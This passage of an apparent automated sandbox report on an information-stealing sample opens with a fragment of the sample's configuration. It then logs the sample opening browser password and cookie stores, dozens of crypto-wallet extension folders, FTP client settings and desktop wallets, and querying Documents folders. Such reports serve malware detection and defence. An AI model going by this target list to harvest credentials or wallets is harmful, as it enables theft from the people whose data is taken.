Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%
              Source: BJQizQ6sqT.exeString found in binary or memory: Wallets/Exodus
              Source: BJQizQ6sqT.exeString found in binary or memory: %appdata%\Ethereum
              Source: BJQizQ6sqT.exe, 00000000.00000003.2292828838.000000000105B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: BJQizQ6sqT.exeString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
